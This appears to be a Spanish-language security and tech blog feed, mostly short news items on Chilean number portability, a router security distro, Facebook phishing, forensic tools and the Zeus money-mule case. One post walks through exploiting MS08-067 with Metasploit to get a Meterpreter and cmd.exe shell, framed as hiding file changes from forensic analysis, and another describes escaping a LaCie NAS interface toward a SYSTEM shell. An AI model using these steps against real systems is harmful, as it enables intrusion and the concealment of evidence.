El objetivo del proyecto (boletín 6964) es incorporar un nuevo artículo 25 bis en la Ley General de Telecomunicaciones con el fin de crear un organismo administrador que se hará cargo de la administración de datos centralizada sobre la que funcionará el sistema de portabilidad numérica de los usuarios de servicios telefónicos.

La portabilidad del número es la posibilidad de que los usuarios puedan cambiar su proveedor de servicio telefónico utilizando el mismo número, sistema que permitirá aumentar la competencia reduciendo las barreras de salida y obligando a los operadores a mejorar la eficiencia en la atención y retención de sus usuarios.

La portabilidad numérica se ha implementado en alrededor de 60 países, en telefonía local, móvil o en ambas, pero en Chile no ha sido posible efectuarla debido a que existe una barrera de salida que redunda en la falta de una mayor competencia en este mercado.

La portabilidad del número local se implementó por primera vez en 1996 en Hong Kong y del número móvil en Singapur, el año 1997. En Latinoamérica ya la han implementado Brasil, México, Perú y Ecuador, encontrándose en proceso República Dominicana, Colombia y Panamá.

Con el establecimiento de la portabilidad numérica, la base de datos de números deberá ser administrada por un Organismo Administrador de la Portabilidad, denominado genéricamente OAP. Esta base de datos deberá ser única y centralizada, conteniendo el listado de números, tanto de redes de telefonía local como de telefonía móvil, además de los números de servicios complementarios.

En la base de datos se le asociará a cada número un código numérico que identificará a cada operador, lo que representará la relación entre el número portado y el operador que tiene el usuario de dicho número como cliente.

El OAP deberá preocuparse de mantener actualizada y libre de fallas la base de datos, que es la fuente de información disponible para determinar el destino de las llamadas. Los concesionarios deberán implementar una copia de la base de datos de portabilidad del OAP, que será consultada en cada llamada para determinar la ruta correcta.

Cuando el usuario se cambie de operador, portando su número, esta información será actualizada en la base de datos, con lo cual cada llamada se encaminará al operador que efectivamente se encuentra atendiendo al usuario.

La iniciativa legal fue remitida al Ejecutivo para que proceda a su promulgación o eventualmente le formule observaciones.

En esta oportunidad hablaremos de una excelente distribución Linux llamada PacketProtector. Este producto está especialmente pensado para ser instalado en un router inalámbrico, con la finalidad de gestionar la seguridad de nuestra conectividad WiFi y de la propia máquina de enrutado. Tal y como se explica en la página del producto, PacketProtector pretende transformar un router en un dispositivo de gestión unificada de amenazas.

PacketProtector cuenta con las siguientes utilidades integradas:

–Un cortafuegos stateful (iptables)
–Capacidad para conectividad WPA/WPA2 Enterprise wireless (802.1X y PEAP con FreeRADIUS)
–Detección de intrusiones (Snort-inline)
–Acceso remoto vía VPN (OpenVPN)
–Filtro de contenidos y controles parentales (DansGuardian)
–Antivirus Web (DG + ClamAV)
–Una autoricad local de certificación SSL (OpenSSL)
–Interfaces de administración seguras (SSH y HTTPS)
–Filtros de cortafiegos para filtrado en aplicaciones de mensajería y P2P
–Prevención de IP spoofing (Linux rp_filter)
–Detección de actrividades anómalas (ipt_unclean)

Para utilizar PacketProtector se recomiendan los routers Linksys WRTSL54GS y ASUS WL-500g, por su especial predisposición para dar servicio a sistemas operativos como el descrito.

Fuentes:
shaw.com
packetprotector.org

Se ha advertido de un nuevo ataque de phising a través de Facebook. Los usuarios reciben un mensaje de Facebook Security donde se pide al usuario que introduzca sus datos para evitar la desactivación de su cuenta de usuario. La razón esgrimida es que otros usuarios han notificado comportamientos indebidos desde su cuenta de usuario.

Según la empresa G Data SecurityLabs, la estafa no es nada original, pero el empeño puesto por los estafadores en pasar desapercibidos es sorprendente. Y es que el remitente se identifica como Facebook Security en donde la k y la t no están escritas con el estilo de letra habitual.

Se trata de un procedimiento habitual entre los cibercriminales, que intentan dar una apariencia legítima a dominios falsos, sustituyendo o latinas por cirílicas o, directamente, por ceros.

Desde la empresa G Data se recomienda poner atención especial a los remitentes desconocidos y no abrir mensajes que puedan contener códigos maliciosos.

Fuente:
LaVanguardia.es

Live View

Una herramienta de la Informática Forense para virtualizar un sistema.

Live View es una aplicación gráfica basada en Java que se utiliza para el análisis forense de la información digital, preparada para evitar la necesidad de utilizar un equipo dedicado para analizar la información de un disco duro, ya que permite crear una imagen VMware con dicho disco y lanzarlo desde nuestro escritorio.

La herramienta es capaz de crear una imagen virtual VMware desde una imagen (dd) o un disco físico. El informático forense puede así arrancar la imagen o el disco y acceder al entorno tal como era. Si necesita introducir alguna alteración, ésta puede posteriormente revertirse, para volver al estado inicial.

En resumen

Live View es capaz de iniciar un sistema desde:

* Imágen RAW de un disco completo
* Imágen RAW de una partición booteable
* Discos físicos (conectados vía a USB o Firewire)
* Formatos de imágen especiales y cerrados (usando 3rd party image mounting software )

Conteniendo los siguientes sistemas operativos:

* Windows 2003, XP, 2000, NT, Me, 98
* Linux (soporte limitado)

Capturas de Pantalla

Pantalla principal de Live View en modo Imagen


Pantalla principal de Live View en modo Disco físico


Una partición Windows XP cargandose en un entorno virtual

Enlaces relacionados:

* Sitio Oficial: http://liveview.sourceforge.net/
* Guía rápida: http://liveview.sourceforge.net/guide.html
* Descargas: http://sourceforge.net/project/showfiles.php?group_id=175252

Fuente:
Taringa

Lima (Peru.com).- El conocido blogger peruano José Alejandro Godoy fue condenado a tres años de prisión preventiva y el pago de 350 mil soles de multa, por colocar en su sitio de internet unos supuestos links o enlaces calumniosos contra el ex congresista fujimorista Jorge Mufarech.

La noticia, dada a conocer a través de la cuenta en Facebook del blog Útero de Marita, generó innumerables muestras de solidaridad con Godoy, pues el ex legislador argumenta que el escritor del blog Desde el tercer Piso, lo calumnió al enlazar artículos de otras publicaciones en las que se lo involucra en varios delitos.

Al parecer para la jueza del °34 Juzgado Penal de Lima, Flor de María La Rosa, los alegatos de Mufarech fueron suficientes para condenar a Godoy, lo que constituye un hecho sin precedentes en nuestra legislación y ha provocado la protesta de entidades como el Instituto Prensa y Sociedad (IPYS).

El post que escribió Godoy en aquella ocasión hacía referencia a una supuesta amenaza que Mufarech había hecho contra un asesor de la bancada nacionalista, en el 2009. Para ello, y solo como referencia, el blogger colocó unos links sobre denuncias anteriores hechas contra el demandante.

Aquí el documento judicial
Sent en CIA

El Senado de Chile aprobó hoy de manera unánime el proyecto de portabilidad numérica, que permitirá que las personas cambien de compañía operadora manteniendo su número de teléfono.

La ley debe pasar ahora a la Cámara de Diputados, que votará en tercer trámite al respecto. Si el proyecto es aprobado ahí, la ley estará lista para ser promulgada en noviembre. De todos modos, la implementación no estará lista hasta mediados de 2011, así que esto no significa que la portabilidad comenzará a funcionar de forma instantánea.

La Subsecretaría de Telecomunicaciones (Subtel) se encuentra trabajando ahora en el reglamento operativo de este sistema, para que pueda estar operativo comercialmente en 2011. Esto implica además que se hará una licitación para decidir quién se hará cargo de la base de datos con todos los números telefónicos, que ahora funcionarán independiente de las compañías de teléfonos.

De acuerdo a los planes, la puesta en marcha de la portabilidad numérica coincidirá, en el caso de la telefonía móvil, con la entrada al mercado de dos nuevos operadores (Nextel y VTR), lo que significa que habrá cinco compañías compitiendo. Esto podría implicar beneficios directos a los consumidores en materia de precios, calidad de servicio e innovación tecnológica.

Link:Gobierno logra unánime aprobación de ley de portabilidad numérica en el Senado (Subtel vía Wayerless)

La semana pasada una estudiante rusa de 22 años fue acusada de conspiración de fraude bancario y el uso de pasaportes falsos. Kristina Svechinskaya, apodada por los medios como la “hacker más sexy del mundo” aunque en realidad actuó como una pieza en el lavado de dinero para una banda cuyo objetivo era robar USD$220 millones de bancos en Gran Bretaña y EE.UU.

En total, 37 personas han sido acusadas en Nueva York por un plan basado en el Este de Europa que usaba el virus llamado “Zeus Trojan”. El programa accede a la computadora cuando la víctima hace clic en un enlace o abrir un archivo adjunto a un mensaje de correo electrónico aparentemente legítimo. Una vez dentro, los hacker pueden monitorear la actividad de la víctima, lo que les permite obtener números de cuentas bancarias, contraseñas y la información de autenticación.

Los fiscales alegan que ella abrió al menos cinco cuentas bancarias y recibió 35.000 dólares del dinero robado. Svechinskaya fue una de las cuatro estudiantes de la Universidad de Nueva York que actuaban como “mulas de dinero” mediante la apertura de cuentas bajo su propio nombre y otras identidades falsas, a cambio del 8 o 10 por ciento

Según el FBI esta red ya ha conseguido al menos 70 millones de dólares, mientras tanto si Svechinskaya resulta culpable podría enfrentar hasta 40 años de prisión.

El fiscal del distrito de Manhattan, Cyrus Vance Jr. dijo que la gente de Rusia, Ucrania, Kazajstán y Bielorrusia, que había obtenido visas de estudiante para venir a los Estados Unidos fue reclutada a través de sitios de redes sociales y anuncios en los periódicos.

Por otro lado el procurador Preet Bharara dijo que “El ratón y el teclado pueden ser mucho más eficaces que la pistola y la máscara (…) La era digital trae consigo muchos beneficios, pero también muchos desafíos para el cumplimiento de la ley y nuestras instituciones financieras”.

Modificación Anti-Forense en Archivos

[Metasploit By: Shell Root]

Ahora lo que me parece muy interesante a la hora de realizar una intrusión en algún Sistema computacional, es la manipulación de archivos. Imaginemos que realizamos una intrusión y por algún motivo modificamos o creamos algún archivo, y no queremos ser detectados por los análisis forenses que se realicen en ese equipo, tendremos que eliminar la fecha de creación y modificación del archivo. Pero como lo hacemos? Entremos que recurrir a nuestro gran amigo, el Metasploit. Miremos un ejemplo:

Primero ingresaremos a la P.C con el exploit:

* exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:

* windows/meterpreter/bind_tcp

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|

       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 18 days ago (2009.12.10)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:5747 -> 192.168.0.3:4444)

meterpreter >

Ahora abriremos un canal para obtener la shell (cmd.exe):

meterpreter > shell
Process 2008 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Yá tenemos la shell en nuestro poder, ahora creemos un archivo de ejemplo: (más…)

Los días 29 y 30 de julio se llevo acabo el evento de seguridad informatica Segurynfo organizado por YanapTI con el apoyo de Cosim TI, tambien  estuvo presente Avira Antivirus, el evento tuvo un lleno total!!.

Avira Antivirus:

HACKING
LOCAL DE SERVIDORES NAS

Fuente:
Israel Rosales

Cada vez es mayor
la necesidad de las empresas en contar con reservas para almacenar sus grandes
volumenes de datos en medios digitales. Sin duda en el mercado  hay un sinfin
de opciones a esta necesidad, algo que percibi es q esta demoda la utilizacion de
los famosos discos lacie, no solo por su capacidad de arreglo para redundancia
de discos, sino porque tambien ofrece las ventajas de administrarlo en red via
Active Directory y almacenar Teras de información (7,5 Tb, 8 Tb, etc).  En su
modo NAS (Network Attached Storage) es bastante utilizado en las
entidades financieras como repositorio de backups y storage de videograbaciones
para camaras de seguridad.El caso es que los Lacie rackeables incluyen en su
estructura logica una version reducida de Windows XP, conocida como Embedded  (XPe)
la cual soporta al software de administracion de este dispositivo, lo curioso
aqui es una pequena vulnerabilidad en Windows XPe  permite escalar
privilegios para obtener shell de system.

Primero que nada,
su software de administración por web  o escritorio remoto (figura de abajo),
es bastante pobre y ofrece muy pocas opciones de verdadero control del equipo.
En definitiva se debe contar con un Servidor de Directorio Activo para
gestionar de manera optima el tema de  grupos vs autorizacion t usuarios vs
permisos para la NAS.

Dentro la Terminal
lo que si se puede hacer es presionar Ctrl + Shift + Esc, para poder abrir el
manejador de tareas de WinXPe.

Una vez abierto el
manejador nos vamos al menú HELP y elegimos la opción About Task Manager
(figura de arriba). (más…)